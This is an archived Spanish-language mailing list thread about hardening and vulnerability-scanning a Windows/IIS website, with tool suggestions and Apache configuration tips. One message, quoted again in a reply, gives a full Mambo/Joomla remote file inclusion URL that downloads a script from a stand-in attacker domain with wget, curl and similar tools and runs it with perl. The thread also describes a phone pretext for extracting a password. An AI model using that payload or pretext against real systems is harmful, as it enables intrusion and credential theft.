Ethical Hacking, aspectos a considerar.

2008-01-17 Thread Roberto Bonvallet
El 17/01/08, Asdtaker <[EMAIL PROTECTED]> escribió:
> - Ingenieria Social: informacion disponible en la web.

No sólo la disponible en la red, sino también la que se puede
conseguir directamente de las personas.  Como si le diste la clave de
root a tu hermano chico, o si la persona que hace el aseo tiene la
llave de la sala de servidores.
-- 
Roberto Bonvallet


Ethical Hacking, aspectos a considerar.

2008-01-17 Thread Rodrigo Fuentealba
2008/1/17, Roberto Bonvallet <[EMAIL PROTECTED]>:
> El 17/01/08, Asdtaker <[EMAIL PROTECTED]> escribió:
> > - Ingenieria Social: informacion disponible en la web.
>
> No sólo la disponible en la red, sino también la que se puede
> conseguir directamente de las personas.

La Ingeniería Social no es la información disponible en la Web; es la
información que sabe la gente de tus equipos y que en realidad no
debería saber. "Naaa, el equipo está con Debian Potato no más, si
total funciona bien así"... (craso error).

-- 
Rodrigo Fuentealba Cartes


Ethical Hacking, aspectos a considerar.

2008-01-17 Thread Lenin Hernández
Si das mas información sobre tu 'sitio web' tal vez obtengas mejor ayuda'

puedes tomar en cuenta
- htaccess
- permisologia en directorios
- políticas de respaldos
- esquemas de particionamiento
- directivas y parámetros en tu servidor web, cualquiera que sea
- puertos abiertos
- buena validacion de los formularios que uses, uso excesivo de javascript,
- monitoreo de logs
- etc...


Saludos




-- 
Lenin Hernández
2.6.18 on Debian Lenny
CUCLUG.: "no hay nada mejor, que hacer lo que realmente te gusta".
Linus Tordvalds.: "If it compiles, it is good, if it boots up it is perfect".


Ethical Hacking, aspectos a considerar.

2008-01-17 Thread Asdtaker
2008/1/17 Lenin Hernández <[EMAIL PROTECTED]>:

> Si das mas información sobre tu 'sitio web' tal vez obtengas mejor ayuda'

mmm, perdon a los fragiles de vista: W2k (todo al dia), IIS, ASP, mucho JS,
sql server 2k.

>
> puedes tomar en cuenta
> - htaccess
> - permisologia en directorios
> - políticas de respaldos
> - esquemas de particionamiento

Ok.

>
> - directivas y parámetros en tu servidor web, cualquiera que sea

A que exactamente te refieres? algun ejemplo de lo que llamas 'directiva' o
'parametros'?

>
> - puertos abiertos

Ok.

>
> - buena validacion de los formularios que uses

Ok,


> , uso excesivo de javascript,

¿Why ?

>
> - monitoreo de logs

Ok.

>
> - etc...
>
>
> Saludos

Gracias.

>
>
>
>
>
> --
> Lenin Hernández
> 2.6.18 on Debian Lenny
> CUCLUG.: "no hay nada mejor, que hacer lo que realmente te gusta".
> Linus Tordvalds.: "If it compiles, it is good, if it boots up it is
> perfect".
>
>


-- 
Saludos, LSM.
Existen 10 tipos de personas:
los que entienden binarios y los que no
From [EMAIL PROTECTED]  Thu Jan 17 16:29:02 2008
From: [EMAIL PROTECTED] (=?ISO-8859-1?Q?Germ=E1n_Po=F3-Caama=F1o?=)
Date: Thu Jan 17 17:04:20 2008
Subject: Guerra santa de nuevo PARA LOS DETRACTORES DE MYSQL
In-Reply-To: <[EMAIL PROTECTED]>
References: <[EMAIL PROTECTED]>
<[EMAIL PROTECTED]>
<[EMAIL PROTECTED]>  <[EMAIL PROTECTED]>
Message-ID: <[EMAIL PROTECTED]>

On Thu, 2008-01-17 at 10:57 -0300, Alvaro Herrera wrote:
> Ricardo Mun~oz A. escribió:
> > Gonzalo Seriche wrote:
> >> hay que leer bien, sun compró mysql para dar soporte a empresas que
> >> quieran migrar desde BD propietarias a otras de codigo abierto.
> >> cito desde fayerwayer:
> >
> > wakala! mejor informarse en un medio mas serio... o directamente en el 
> > sitio de MySQL:
> >
> > http://www.mysql.com/news-and-events/sun-to-acquire-mysql.html
> 
> Una nota en el blog de Josh Berkus, miembro del Core Committee de
> Postgres y a cargo de Postgres en Sun:
> 
> http://blogs.ittoolbox.com/database/soup/archives/sun-acquires-mysql-21822
> 
> 1. Sun is not dropping PostgreSQL support.
> 
> 5. I don't know right now what Sun will do about MySQL 6.0, Falcon, MySQL
> Cluster, licensing, InnoDB, or specific members of the MySQL staff. So don't
> ask me. 

!Lo que sucede es que los de MySQL son unos vendidos!

-- 
Germán Poó Caamaño
Concepción - Chile


Ethical Hacking, aspectos a considerar.

2008-01-17 Thread Ricardo Mun~oz A.
Asdtaker wrote:
> 2008/1/17 Lenin Hernández <[EMAIL PROTECTED]>:
>
>   
>> Si das mas información sobre tu 'sitio web' tal vez obtengas mejor ayuda'
>> 
>
> mmm, perdon a los fragiles de vista: W2k (todo al dia), IIS, ASP, mucho JS,
> sql server 2k.
>   

aplicar BackTrack[1], para que tenga algo que ver con esta lista...

[1] http://www.remote-exploit.org/backtrack.html

-- 
Ricardo Mun~oz A.
Usuario Linux #182825 (counter.li.org)
From [EMAIL PROTECTED]  Thu Jan 17 17:21:05 2008
From: [EMAIL PROTECTED] (=?UTF-8?Q?Lenin_Hern=C3=A1ndez?=)
Date: Thu Jan 17 17:24:14 2008
Subject: Ethical Hacking, aspectos a considerar.
In-Reply-To: <[EMAIL PROTECTED]>
References: <[EMAIL PROTECTED]>
<[EMAIL PROTECTED]>
<[EMAIL PROTECTED]>
<[EMAIL PROTECTED]>
<[EMAIL PROTECTED]>
Message-ID: <[EMAIL PROTECTED]>

> mmm, perdon a los fragiles de vista: W2k (todo al dia), IIS, ASP, mucho JS,
> sql server 2k.
>

Te advierto que el uso prolongado de M$ te puede freir las neuronas''




> A que exactamente te refieres? algún ejemplo de lo que llamas 'directiva' o
> 'parametros'?

Ok asumiendo que usas apache y no Cherokee ni lighttpd, Webrick o
cualquier otro... Segun tus necesidades particulares buscando
seguridad podrias:
- reducir el tiempo de espera (tiemeout)
- permitir o nop conexiones persistentes
- si no tienes mucho trafico reducir el numero de peticiones a aceptar
asi como el tiempo q debe transcurrir para otra peticion
- usuario y grupo propio y exclusivo para apache
- tal vez esconder la info del server vercion y modulos cargados
- tal vez modificar o personalizar los mensajes de error del web
server(error 403, 404 etc...)
- instalar modulos de apache que te harian la vida mas bonita como
mod_evasive (evita ataques de denegacion de servicio), mod_security
etc...
- restriccion de ip o rangos de ip etc..
- no permitir la ejecucion de cji's
- entre muchos otros...

Saludos





> > , uso excesivo de javascript,
>
> ¿Why ?
unmhh  conexion a base de datos por javascripts'' uchh, validacion de
formularios solo por javascript!! entre otros relacionados



-- 
Lenin Hernández
2.6.18 on Debian Lenny
CUCLUG.: "no hay nada mejor, que hacer lo que realmente te gusta".
Linus Tordvalds.: "If it compiles, it is good, if it boots up it is perfect".


Ethical Hacking, aspectos a considerar.

2008-01-17 Thread Raphael Verdugo
2008/1/17 Rodrigo Fuentealba <[EMAIL PROTECTED]>:
> 2008/1/17, Roberto Bonvallet <[EMAIL PROTECTED]>:
> > El 17/01/08, Asdtaker <[EMAIL PROTECTED]> escribió:
> > > - Ingenieria Social: informacion disponible en la web.
> >
> > No sólo la disponible en la red, sino también la que se puede
> > conseguir directamente de las personas.
>
> La Ingeniería Social no es la información disponible en la Web; es la
> información que sabe la gente de tus equipos y que en realidad no
> debería saber. "Naaa, el equipo está con Debian Potato no más, si
> total funciona bien así"... (craso error).

mmm... .La ingenieria social no es la manipulacion de usuarios
"legitimos" para obtener informacion "sensible"?. Esta manipulacion
siempre es sútil e indolora, el usuario jamas se entera de que reveló
informacion a quién no debía o que no debía...

http://es.wikipedia.org/wiki/Ingenier%C3%ADa_social_(seguridad_inform%C3%A1tica)







-- 
Raphael Verdugo P.


Ethical Hacking, aspectos a considerar.

2008-01-17 Thread Rodrigo Fuentealba
El 17/01/08, Raphael Verdugo <[EMAIL PROTECTED]> escribió:

> mmm... .La ingenieria social no es la manipulacion de usuarios
> "legitimos" para obtener informacion "sensible"?. Esta manipulacion
> siempre es sútil e indolora, el usuario jamas se entera de que
> reveló informacion a quién no debía o que no debía...

...como por ejemplo el administrador de sistemas que revela que una
máquina está hace tiempo sin actualizaciones; el que no está muy
preocupado por su seguridad podría ser considerar sutil esa simple
frase... pero que dice más que lo que quiere decir. A eso me refería.
Y sí, estaba pensando en el ejemplo de los equipos, debería decir
"sistemas"; lo siento de nuevo.

Un caso que conocí (de cerca) fue justamente porque un sysadmin
gustaba mucho de los tarreos. Conversando sobre la pega, con un par de
cervezas dijo "que en realidad se dedicaba a estudiar durante el día,
así que había instalado un software [[bakan]] que le daba el estado de
los discos duros y todo el reporte a través de una página Web, y que
andaba trayéndolo en un CD-ROM de respaldos". El software en cuestión
era phpsysinfo, y su versión por esos días tenía más de un año de
antiguedad (y por ende varias fallas). El resto es historia.

-- 
Rodrigo Fuentealba Cartes


Ethical Hacking, aspectos a considerar.

2008-01-18 Thread Eduardo Peña Ceballos

Asdtaker wrote:
> Estimados, alguien tiene idea de los aspecto de debiese considerar a la hora
> de realizar un escaneo de vulnerabilidades a mi sitio web?
> 


Informarte que si las versiones del software que estas ocupando para 
dicho servidor web presentan algún tipo de vulnerabilidad conocida.

Herramientas como nmap, nessus o el siempre útil netcat pueden ayudarte 
con esa tarea.

Ya lo otro es buscar si existen como te decia vulnerabilidades o uno que 
otro 'zero day' disponibles en la red.

Si tienes la oportunidad de preocuparte con el acceso físico a la 
máquina, ya que sacando solo un cable, te pueden regalar un simpático DoS.




-- 
Eduardo Peña Ceballos
Estudiante Ingeniería (e) Informática - PUCV
http://www.kope.cl


Ethical Hacking, aspectos a considerar.

2008-01-18 Thread Patricio Morales
El 17/01/08, Asdtaker <[EMAIL PROTECTED]> escribió:
> Estimados, alguien tiene idea de los aspecto de debiese considerar a la hora
> de realizar un escaneo de vulnerabilidades a mi sitio web?
>
> Por ahora considero estos ITEMs:
>
> - Ingenieria Social: informacion disponible en la web.
> - Archivos por defecto: todo aquello que viene con la instalacion en bruto
> del server web.
> - Extensiones por defecto: analizar el impacto de soportar distintas
> extensiones.
> - Sesiones: comprobar validez de sesiones, etc.
> - Manejo de errores: de aplicacion y servidor.
> - SQL Injection.
>
deberías considerar los lenguajes de programación (Asp, Php)
las bases de datos que ocupas (Sql Server,Oracle,Mysql,Postgresql)
y las posibilidades de que sufran ataques por web browser
las correctas actualizaciones de seguridad tanto del servidor
como de las aplicaciones.
Las aplicaciones correctas de filtros a traves de Firewall ,y la
habilitación  sólo de aquellos servicios que te son necesarios.

Saludos.
-- 
Patricio Morales Fariña
Técnico en Computación
Alumno Ing. Informática (Técnicos Vespertino)
Universidad de los Lagos
045-219291- Temuco Chile
cel 78732062-


Ethical Hacking, aspectos a considerar.

2008-01-18 Thread Alberto Rivera
Lenin Hernández wrote:
>> mmm, perdon a los fragiles de vista: W2k (todo al dia), IIS, ASP, mucho JS,
>> sql server 2k.
>> 
No había leído nunca algo así ...
>> 
>
> Te advierto que el uso prolongado de M$ te puede freir las neuronas''
>
>
>
>
>   
>> A que exactamente te refieres? algún ejemplo de lo que llamas 'directiva' o
>> 'parametros'?
>> 
>
> Ok asumiendo que usas apache y no Cherokee ni lighttpd, Webrick o
> cualquier otro... Segun tus necesidades particulares buscando
> seguridad podrias:
> - reducir el tiempo de espera (tiemeout)
> - permitir o nop conexiones persistentes
> - si no tienes mucho trafico reducir el numero de peticiones a aceptar
> asi como el tiempo q debe transcurrir para otra peticion
> - usuario y grupo propio y exclusivo para apache
> - tal vez esconder la info del server vercion y modulos cargados
> - tal vez modificar o personalizar los mensajes de error del web
> server(error 403, 404 etc...)
> - instalar modulos de apache que te harian la vida mas bonita como
> mod_evasive (evita ataques de denegacion de servicio), mod_security
> etc...
> - restriccion de ip o rangos de ip etc..
> - no permitir la ejecucion de cji's
> - entre muchos otros...
>
> Saludos
>
>
>
>
>
>   
>>> , uso excesivo de javascript,
>>>   
>> ¿Why ?
>> 
> unmhh  conexion a base de datos por javascripts'' uchh, validacion de
> formularios solo por javascript!! entre otros relacionados
>
>
>
>   


Ethical Hacking, aspectos a considerar.

2008-01-18 Thread Alberto Rivera
Rodrigo Fuentealba wrote:
> El 18/01/08, Horst H. von Brand <[EMAIL PROTECTED]> escribió:
>
>   
>> Lenin Hernández <[EMAIL PROTECTED]> wrote:
>>
>> [...]
>> 
>>> - si no tienes mucho trafico reducir el numero de peticiones
>>> a aceptar asi como el tiempo q debe transcurrir para otra
>>> peticion
>>>   
>> Esa clase de medidas reduce (no elimina!) la ventana de posibles
>> vulnerabilidades.
>> 
>
> Y aumenta la posibilidad de denegaciones de servicio pues es más fácil
> saturarte de peticiones, a mi parecer.
>
>   
>>> - usuario y grupo propio y exclusivo para apache
>>>   
>> En Windows?!
>> 
>
> NT sí; IUSR_NOMBREDELAMAQUINA, generalmente. PostgreSQL también tiene
> su usuario y grupo propio cuando se instala ahí.
>
>   
>>> - tal vez esconder la info del server vercion y modulos cargados
>>> - tal vez modificar o personalizar los mensajes de error del web
>>> server(error 403, 404 etc...)
>>>   
>> "Security through obscurity, isn't" [No sacas nada con pintarlo de rosado
>> para que no lo reconozcan como elefante por lo gris si te enfrentas a quien
>> dispara a cuanta cosa grande se le pone delante... o (peor aun), quien se
>> entero de tu "truquito" por algun medio. Por lo demas, /esta/ clase de
>> trucos son tan faciles de llevar a cabo y tan "obviamente seguros" (y por
>> tanto tan populares) que a lo mas detienen al script kiddie promedio unos
>> pocos minutos. Para perspectiva, date una vueltecita por las cosas que
>> puede hacer nmap sin demasiado esfuerzo, y consulta por alli por "passive
>> fingerprinting"...]
>>
>> 
>
> Seguridad por oscuridad no es seguridad, pero mientras detenga un
> tiempo más al posible victimario, igual sirve. Si voy arrancando de un
> sicario que me quiere matar y puedo tirarle sillazos para que
> tropiece, puedo escaparme.
>   
En realidad no sacas absolutamente nada al tratar de ocultar algo hoy en 
día ya que el software te hace miles de millones de cosas más de las que 
tu puedes hacer ... o sea, si ocultas algo por ejemplo en el sshd_conf 
le cambias el puerto al ssh, en cuanto tiempo piensas tu que te lo van 
reconocer? ... otra cosa por ejemplo es el filtrar con iptables el 
puerto 22 para que no te hagan un ataque por diccionario ... no sé una idea

salu2
>   
>>> - instalar modulos de apache que te harian la vida mas bonita como
>>> mod_evasive (evita ataques de denegacion de servicio), mod_security
>>> etc...
>>>   
>> Si no los necesitas...
>> 
>
> mod_security es bonito pero a veces se torna complejo de configurar
> (sobretodo con varios sitios y varios requerimientos); úsalo con
> precaución.
>
> mod_evasive lo he probado y parece bueno, pero evalúa primero el
> historial de seguridad.
>
>   
>>> - restriccion de ip o rangos de ip etc..
>>> - no permitir la ejecucion de cji's
>>>   
>> Esa clase de cosas hay que cortarlas si no las requieres, obvio; si las
>> requieres, las requieres...
>> 
>
> Intenta no requerirlas a toda costa. Muchas cosas que puedes hacer a
> través de un CGI también puedes hacerlas con funciones de PHP como
> módulo de apache (si le quitas las funciones peligrosas como popen y
> exec, y lo configuras bien...).
>
> Saludos,
>
>   


Ethical Hacking, aspectos a considerar.

2008-01-18 Thread Asdtaker
2008/1/18 Alberto Rivera <[EMAIL PROTECTED]>:

> Lenin Hernández wrote:
> >> mmm, perdon a los fragiles de vista: W2k (todo al dia), IIS, ASP, mucho
> JS,
> >> sql server 2k.
> >>
> No había leído nunca algo así ...
> >>
>
I know my friend, butLa necesidad tiene cara de ereje. Aunque aqui tengo
un equipo con ubuntu preparado para atacar  y hacer las pruebas que resuma
de este hilo.

De hecho estuve mirando las del ultimo correo, se ven bastante potentes.

PD: ese server no es mio, solo me lo "encacharon".

>
> >
> > Te advierto que el uso prolongado de M$ te puede freir las neuronas''
> >
> >
> >
> >
> >
> >> A que exactamente te refieres? algún ejemplo de lo que llamas
> 'directiva' o
> >> 'parametros'?
> >>
> >
> > Ok asumiendo que usas apache y no Cherokee ni lighttpd, Webrick o
> > cualquier otro... Segun tus necesidades particulares buscando
> > seguridad podrias:
> > - reducir el tiempo de espera (tiemeout)
> > - permitir o nop conexiones persistentes
> > - si no tienes mucho trafico reducir el numero de peticiones a aceptar
> > asi como el tiempo q debe transcurrir para otra peticion
> > - usuario y grupo propio y exclusivo para apache
> > - tal vez esconder la info del server vercion y modulos cargados
> > - tal vez modificar o personalizar los mensajes de error del web
> > server(error 403, 404 etc...)
> > - instalar modulos de apache que te harian la vida mas bonita como
> > mod_evasive (evita ataques de denegacion de servicio), mod_security
> > etc...
> > - restriccion de ip o rangos de ip etc..
> > - no permitir la ejecucion de cji's
> > - entre muchos otros...
> >
> > Saludos
> >
> >
> >
> >
> >
> >
> >>> , uso excesivo de javascript,
> >>>
> >> ¿Why ?
> >>
> > unmhh  conexion a base de datos por javascripts'' uchh, validacion de
> > formularios solo por javascript!! entre otros relacionados
> >
> >
> >
> >
>
>


-- 
Saludos, LSM.
Existen 10 tipos de personas:
los que entienden binarios y los que no
From [EMAIL PROTECTED]  Fri Jan 18 17:56:09 2008
From: [EMAIL PROTECTED] (Alberto Rivera)
Date: Fri Jan 18 17:59:26 2008
Subject: Ethical Hacking, aspectos a considerar.
In-Reply-To: <[EMAIL PROTECTED]>
References: <[EMAIL PROTECTED]>
Message-ID: <[EMAIL PROTECTED]>

Asdtaker wrote:
> Estimados, alguien tiene idea de los aspecto de debiese considerar a la hora
> de realizar un escaneo de vulnerabilidades a mi sitio web?
>
> Por ahora considero estos ITEMs:
>
> - Ingenieria Social: informacion disponible en la web.
> - Archivos por defecto: todo aquello que viene con la instalacion en bruto
> del server web.
> - Extensiones por defecto: analizar el impacto de soportar distintas
> extensiones.
> - Sesiones: comprobar validez de sesiones, etc.
> - Manejo de errores: de aplicacion y servidor.
> - SQL Injection.
>
>
> Gracias por sus comentarios.
>   
A una cosa, se me olvidaba con rkhunter, unhide, ckhrootkit o tripwire 
puedes mantener limpios los sistemas y puedes observar conflictos o bugs 
de los paquetes instalados así como modificaciones en el código que se 
hayan hecho en algún momento, son bastante buenos para mantener la 
seguridad en la máquina.

salu2
>
>
>
>
>   


Ethical Hacking, aspectos a considerar.

2008-01-18 Thread Lenin Hernández
> > Seguridad por oscuridad no es seguridad, pero mientras detenga un
> > tiempo más al posible victimario, igual sirve.
>
> El punto es que /no lo detiene en lo absoluto/.

Todos sabemos que la seguridad absoluta no existe y lamentablemente
nadie tiene la verdad absoluta acerca de la seguridad, pero en
nuestras manos queda que nuestros sistemas no sean exageradamente
vulnerables''


Si usa win + sql server + mssql + asp + iss  en lo particular creo que
no hay muchas medidas de seguridad a tomar y tambien creo q no tiene
cabida en esta lista... son mis opiniones

Saludos'''


-- 
Lenin Hernández
2.6.18 on Debian Lenny
CUCLUG.: "no hay nada mejor, que hacer lo que realmente te gusta".
Linus Tordvalds.: "If it compiles, it is good, if it boots up it is perfect".


Ethical Hacking, aspectos a considerar.

2008-01-18 Thread Alberto Rivera
Asdtaker wrote:
> 2008/1/18 Alberto Rivera <[EMAIL PROTECTED]>:
>
>   
>> Lenin Hernández wrote:
>> 
 mmm, perdon a los fragiles de vista: W2k (todo al dia), IIS, ASP, mucho
 
>> JS,
>> 
 sql server 2k.

 
>> No había leído nunca algo así ...
>> 
> I know my friend, butLa necesidad tiene cara de ereje. Aunque aqui tengo
> un equipo con ubuntu preparado para atacar  y hacer las pruebas que resuma
> de este hilo.
>   
 try with Debian better, ubuntu it's made for desk's =)
> De hecho estuve mirando las del ultimo correo, se ven bastante potentes.
>
> PD: ese server no es mio, solo me lo "encacharon".
>   
reemplazalo, todo lo que esta para software propietario esta en el 
software libre.
>   
>>> Te advierto que el uso prolongado de M$ te puede freir las neuronas''
>>>
>>>
>>>
>>>
>>>
>>>   
 A que exactamente te refieres? algún ejemplo de lo que llamas
 
>> 'directiva' o
>> 
 'parametros'?

 
>>> Ok asumiendo que usas apache y no Cherokee ni lighttpd, Webrick o
>>> cualquier otro... Segun tus necesidades particulares buscando
>>> seguridad podrias:
>>> - reducir el tiempo de espera (tiemeout)
>>> - permitir o nop conexiones persistentes
>>> - si no tienes mucho trafico reducir el numero de peticiones a aceptar
>>> asi como el tiempo q debe transcurrir para otra peticion
>>> - usuario y grupo propio y exclusivo para apache
>>> - tal vez esconder la info del server vercion y modulos cargados
>>> - tal vez modificar o personalizar los mensajes de error del web
>>> server(error 403, 404 etc...)
>>> - instalar modulos de apache que te harian la vida mas bonita como
>>> mod_evasive (evita ataques de denegacion de servicio), mod_security
>>> etc...
>>> - restriccion de ip o rangos de ip etc..
>>> - no permitir la ejecucion de cji's
>>> - entre muchos otros...
>>>
>>> Saludos
>>>
>>>
>>>
>>>
>>>
>>>
>>>   
> , uso excesivo de javascript,
>
>   
 ¿Why ?

 
>>> unmhh  conexion a base de datos por javascripts'' uchh, validacion de
>>> formularios solo por javascript!! entre otros relacionados
>>>
>>>
>>>
>>>
>>>   
>> 
>
>
>   


Ethical Hacking, aspectos a considerar.

2008-01-18 Thread Claudio Salazar S.
Alberto Rivera wrote:
> Asdtaker wrote:
>> Estimados, alguien tiene idea de los aspecto de debiese considerar a 
>> la hora
>> de realizar un escaneo de vulnerabilidades a mi sitio web?
>>
>> Por ahora considero estos ITEMs:
>>
>> - Ingenieria Social: informacion disponible en la web.
>> - Archivos por defecto: todo aquello que viene con la instalacion en 
>> bruto
>> del server web.
>> - Extensiones por defecto: analizar el impacto de soportar distintas
>> extensiones.
>> - Sesiones: comprobar validez de sesiones, etc.
>> - Manejo de errores: de aplicacion y servidor.
>> - SQL Injection.
>>
>>
>> Gracias por sus comentarios.
>>   
> Mira toma nessus y lo corres desde el exterior y después desde el 
> interior de la organización esto te va a encontrar varias 
> vulnerabilidades y sus niveles de vulnerabilidad, luego tomas nmap y 
> tratar de insertar exploits conocidos a servicios conocidos desde dentro 
> y afuera cada vez, prueba varias herramientas en contra de tu sitio, 
> trata de explotarlo de forma controlada, o sea, no lo hagas cuando estén 
> todos trabajando ...  esto te va a entregar una visión un poco más 
> específica de cualquier problemática que puedas tener. 

Metasploit tiene buen desarrollo ahora.
Tambien una utilidad que tiene la gente de Microsoft
MBSA (Microsoft Baseline Analyzer)

http://www.microsoft.com/spain/technet/seguridad/herramientas/mbsa.mspx

> Ahora para el 
> desarrollo propiamente tal, prueba inyecciones de mysql, php y 
> vulnerabilidades de javascript o ajax o lo que tengas, para hacer 
> inyecciones de forma remota hay varias formas de hacerlo y están super 
> documentadas incluso en youtube puedes encontrar videos bastante buenos 
> ...  a nivel de servidor elimina cualquier software que sirva para bajar 
> cosas del internet para que no te puedan ejecutar ningún código dentro 
> de la máquina

Borrar ftp ?
Un atacante con habilidades te crea un socket en ASP y adios downloaders.

> y para que imposibilites a los atacantes a hacer cosas 
> como esta :
> 
> http://tudominio/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=
>  
> 
> 1&GLOBALS=&mosConfig_absolute_path=http://dominiousadoporelatacante/directorioherramientas/tool25.txt?&cmd=cd%20/tmp;
>  
> 
> wget%20http://dominiousadoporelatacante/directorioherramientas/spkat.txt;
> curl%20-O%20http://dominiousadoporelatacante/directorioherramientas/spkat.txt;
>  
> 
> lwp-download%20-a%20http://dominiousadoporelatacante/directorioherramientas/spkat.txt;
>  
> 
> GET%20http://dominiousadoporelatacante/directorioherramientas/spkat.txt;
> lynx%20-source%20http://dominiousadoporelatacante/directorioherramientas/spkat.txt;
>  
> 
> links%20-source%20http://dominiousadoporelatacante/directorioherramientas/spkat.txt;
>  
> 
> perl%20spkat.txt
> 

Eso son casos especificos de explotacion de Mambo o Joomla con RFI. Él 
dejo en claro hace rato que esta trabajando con IIS, asi que los wget, 
curl -O, etc( que hacen lo mismo ), no tendrian validez, aunque 
explotaciones de RFI sobre Windows dan resultado pero son un poco mas 
rebuscadas.


> si te fijas aquí el atacante no se fija ni en ingeniería social ni en 
> datos de ningún tipo sólo hace un ataque vía sitio web, y ve si tu sitio 
> tiene permiso de ejecutar cualquiera de las aplicaciones de descarga o 
> navegación, con esto baja un paquete, para el ejemplo spkat.txt y 
> después lo ejecuta con perl. El spkat lo que hace es abrir puertos, 
> levantar servicios, ejecutar troyanos dentro de la máquina o cualquier 
> cosa 
> 
> Ahora lo de la ingeniera social es para cuestiones super puntuales por 
> ejemplo, para conseguir acceso a un sistema en red, por ejemplo llamas a 
> la secretaria de administración y le dices que eres el gerente de 
> operaciones y le pides un nombre de usuario y password del sistema, así 
> puedes ver realmente cual es el nivel de seguridad que cuentas de parte 
> de los usuarios ... pero la ing. social no es encontrar información en 
> internet.
> 
> eso, espero te sirva
> 
> salu2
>>
>>
>>



Ethical Hacking, aspectos a considerar.

2008-01-21 Thread Alberto Rivera
Claudio Salazar S. wrote:
> Alberto Rivera wrote:
>> Asdtaker wrote:
>>> Estimados, alguien tiene idea de los aspecto de debiese considerar a 
>>> la hora
>>> de realizar un escaneo de vulnerabilidades a mi sitio web?
>>>
>>> Por ahora considero estos ITEMs:
>>>
>>> - Ingenieria Social: informacion disponible en la web.
>>> - Archivos por defecto: todo aquello que viene con la instalacion en 
>>> bruto
>>> del server web.
>>> - Extensiones por defecto: analizar el impacto de soportar distintas
>>> extensiones.
>>> - Sesiones: comprobar validez de sesiones, etc.
>>> - Manejo de errores: de aplicacion y servidor.
>>> - SQL Injection.
>>>
>>>
>>> Gracias por sus comentarios.
>>>   
>> Mira toma nessus y lo corres desde el exterior y después desde el 
>> interior de la organización esto te va a encontrar varias 
>> vulnerabilidades y sus niveles de vulnerabilidad, luego tomas nmap y 
>> tratar de insertar exploits conocidos a servicios conocidos desde 
>> dentro y afuera cada vez, prueba varias herramientas en contra de tu 
>> sitio, trata de explotarlo de forma controlada, o sea, no lo hagas 
>> cuando estén todos trabajando ...  esto te va a entregar una visión 
>> un poco más específica de cualquier problemática que puedas tener. 
>
> Metasploit tiene buen desarrollo ahora.
No sé si te refieres al metasplist msfencode??? si es así en realidad 
están super avanzados ...
> Tambien una utilidad que tiene la gente de Microsoft
> MBSA (Microsoft Baseline Analyzer)
... tengo malas experiencias por el cuento de los rpc con esta 
herramienta, pero creo que hay otro software que se llama visio o algo 
así que logra, según mi percepción, dejar el software más estable, yo 
probé estas herramientas hace un tiempo y las dejé de lado, de hecho 
deje todos los nt's (aunque era muy bueno), 2000 y 2003 server de lado y 
ahora hago todo con linux, ya que aunque no se quiera siempre es más 
seguro y no hay que estar tan pendiente de todo ...
>
> http://www.microsoft.com/spain/technet/seguridad/herramientas/mbsa.mspx
>
>> Ahora para el desarrollo propiamente tal, prueba inyecciones de 
>> mysql, php y vulnerabilidades de javascript o ajax o lo que tengas, 
>> para hacer inyecciones de forma remota hay varias formas de hacerlo y 
>> están super documentadas incluso en youtube puedes encontrar videos 
>> bastante buenos ...  a nivel de servidor elimina cualquier software 
>> que sirva para bajar cosas del internet para que no te puedan 
>> ejecutar ningún código dentro de la máquina
>
> Borrar ftp ?
> Un atacante con habilidades te crea un socket en ASP y adios downloaders.
si pero es basante más complejo y requiere de muchos más permisos que si 
utiliza la mismas herramientas del sistema, de hecho cuando se basurea 
para ver sobre que máquina se está, lo primero es ver qué servicios 
tiene, que versión del software, se buscan los exploits ... o sea, 
mientras menos cosas tenga un servidor de producción mejor...
>
>> y para que imposibilites a los atacantes a hacer cosas como esta :
>>
>> http://tudominio/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=
>>  
>>
>> 1&GLOBALS=&mosConfig_absolute_path=http://dominiousadoporelatacante/directorioherramientas/tool25.txt?&cmd=cd%20/tmp;
>>  
>>
>> wget%20http://dominiousadoporelatacante/directorioherramientas/spkat.txt; 
>>
>> curl%20-O%20http://dominiousadoporelatacante/directorioherramientas/spkat.txt;
>>  
>>
>> lwp-download%20-a%20http://dominiousadoporelatacante/directorioherramientas/spkat.txt;
>>  
>>
>> GET%20http://dominiousadoporelatacante/directorioherramientas/spkat.txt;
>> lynx%20-source%20http://dominiousadoporelatacante/directorioherramientas/spkat.txt;
>>  
>>
>> links%20-source%20http://dominiousadoporelatacante/directorioherramientas/spkat.txt;
>>  
>>
>> perl%20spkat.txt
>>
>
> Eso son casos especificos de explotacion de Mambo o Joomla con RFI. Él 
> dejo en claro hace rato que esta trabajando con IIS, asi que los wget, 
> curl -O, etc( que hacen lo mismo ), no tendrian validez, aunque 
> explotaciones de RFI sobre Windows dan resultado pero son un poco mas 
> rebuscadas.
así tienes razón ... esto es para joomla y mambo, pero también funciona 
sobre otros cms y modificando algunas cosas también funcionan sobre 
desarrollos propietarios, de hecho creo que modificando esto igual cae 
un IIS o una aplicación sobre asp por ejemplo.

salu2 again =)
>
>
>> si te fijas aquí el atacante no se fija ni en ingeniería social ni en 
>> datos de ningún tipo sólo hace un ataque vía sitio web, y ve si tu 
>> sitio tiene permiso de ejecutar cualquiera de las aplicaciones de 
>> descarga o navegación, con esto baja un paquete, para el ejemplo 
>> spkat.txt y después lo ejecuta con perl. El spkat lo que hace es 
>> abrir puertos, levantar servicios, ejecutar troyanos dentro de la 
>> máquina o cualquier cosa 
>>
>> Ahora lo de la ingeniera social es para cuestiones super puntuales 
>> por ejemplo, para conseguir acceso a un sistema en red, por ejemplo 
>> 

Ethical Hacking, aspectos a considerar.

2008-01-21 Thread Jorge Severino
[EMAIL PROTECTED] escribió el 21/01/2008 11:45:58:


> > 
> no comparto esta visión contigo, mi percepción es la de capacitar 
> exponencialmente a las personas que están ejecutando las tareas 
> informáticas, considerando los mismos valores de los servicios y 
> licencias que prestan las empresas de software propietario, logrando con 

> esto una independencia y  avance considerable entre la gente que 
> administra los recursos en tu empresa, el cual ojalá se pudiera 
> compartir =) para que no sé pierda en el tiempo, pero esa es mi visión 

> 

Visión por cierto un poco soñadora y fuera del ámbito ambicioso 
empresarial nacional.
Comparto plenamente en que hay cosas que no se pueden migrar debido al 
impacto al negocio y el alto riesgo que implica.
From [EMAIL PROTECTED]  Mon Jan 21 12:06:08 2008
From: [EMAIL PROTECTED] (Alberto Rivera)
Date: Mon Jan 21 12:09:28 2008
Subject: Laptop para Linux
In-Reply-To: <[EMAIL PROTECTED]>
References: <[EMAIL PROTECTED]> <[EMAIL PROTECTED]>
<[EMAIL PROTECTED]>
